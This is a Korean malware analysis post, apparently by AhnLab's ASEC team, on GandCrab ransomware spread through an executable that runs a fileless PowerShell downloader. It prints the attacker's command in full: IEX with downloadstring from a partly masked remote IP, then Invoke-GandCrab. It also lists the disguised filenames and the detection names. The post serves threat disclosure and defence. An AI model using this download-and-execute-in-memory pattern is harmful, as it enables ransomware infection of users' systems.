갠드크랩(GandCrab) 랜섬웨어는 타 랜섬웨어와 비교하면 그 유포방식이 다양하다. 다양한 유포방식은 브라우저 취약점을 통한 드라이브 바이 다운로드, 정상 소프트웨어 위장, 이메일 문서 첨부방식 등이 확인되었다. 다양한 유포방식에 못지않게 랜섬웨어의 파일 외형 또한 다양한 방식으로 변화를 보이고 있다. 최근 ASEC은 이러한 유포방식을 모니터링 중 파워쉘 스크립트 형태로 동작하는 갠드크랩 랜섬웨어의 유포 정황을 발견했다. 과거에 이와 유사한 형태가 문서파일 내부의 매크로 코드에서 확인된 사례가 있으나, 실행파일에서 파워쉘을 이용한 것이 확인된 것은 이번이 처음이다.


아래 <그림 1>은 갠드크랩 랜섬웨어를 다운로드하는 기능을 수행하는 실행파일(EXE)의 코드 중 일부이다. 해당 실행파일은 파워쉘 커맨드를 실행하는 기능만 수행한다. 


<그림 1. 파워쉘 스크립트를 실행하는 부분>



해당 파워쉘 커맨드는 유포지 서버로부터 랜섬웨어 본체를 사용자 시스템에 생성과정 없이 메모리에서 실행시킨다. 따라서 동작 시, <그림 2>와 같은 프로세스 트리를 보이며, 정상 프로세스인 Powershell.exe가 파일을 암호화하는 프로세스가 된다.


<그림 2. 프로세스 트리>



<표 1>은 <그림 1>에서 사용되는 파워쉘 명령이다. 해당 구문은 공격자 서버로부터 다운로드 받은 파워쉘 스크립트의 특정 함수(Invoke-GandCrab)의 실행을 의미한다. 그리고 Invoke-GandCrab 함수실행 후, 일정 시간(1000000초=270시간)을 대기한다. 이는 파일이 암호화되는 동안 프로세스가 종료되지 못하도록 하기 위함으로 파악된다. 또한 공격자는 교묘하게도 유포할 파워쉘 스크립트의 파일명을 ahnlab.txt로 사용했다.


 파워쉘 명령

 IEX ((new-object net.webclient).downloadstring('http://91.x10.1x4.x4x/ahnlab.txt'));Invoke-GandCrab;Start-Sleep -s 1000000;

<표 1. 파워쉘 스크립트 구동관련 코드>



아래 <그림 3>은 파워쉘 스크립트로 내부에 Invoke-GandCrab 함수가 존재하며, 유포지 서버가 활성화되어 있을경우, <표 1>의 파워쉘 명령으로 해당 함수가 사용자 시스템에서 실행된다. 이처럼 같은 랜섬웨어 일지라도 파일의 유형은 계속해서 다양해질 것으로 예측된다.  


<그림 3. 파워쉘 스크립트 내의 실행함수>




현재 안랩 제품에서는 파워쉘 스크립트로 유포되는 갠드크랩 랜섬웨어를 다음과 같이 진단하고 있다.


  • 파일 진단: Trojan/Win32.Agent(2018.07.05.06)
  • 행위 진단: Malware/MDP.Ransom.M1964

  • 추가로, 최근 정상파일로 위장하여 배포되는 GandCrab은 아래와 같은 파일명들이 확인되었다.

    • windows_7_iso.exe

    • 건축_도면.exe

    • 카트라이더_핵.exe

    • 판도라tv_동영상.exe

    • 무료_mp3_음악.exe

    • ppt_템플릿.exe

    • 태양의_후예.exe

    • 워프레임_캐시.exe

    • 오토_캐드_2010.exe

    • 윈도우7_정품인증.exe

    • 파워포인트_2010.exe

    • 네이버tv_동영상.exe

    • 사이툴_한글판.exe

    • mlb2k12.exe

    • 웹페이지.exe

    • web_동영상.exe

    • 곰오디오_스킨.exe

    • 병맛_전쟁_시뮬레이터.exe

    • 스팀_창작마당.exe

    • 로지텍_드라이버_속도.exe

    • 링크티비.exe

    • 네이버_동영상_편집기.exe

    • 뿌요뿌요_테트리스.exe

    • 일러스트_레이터_cs5.exe


    Posted by 분석팀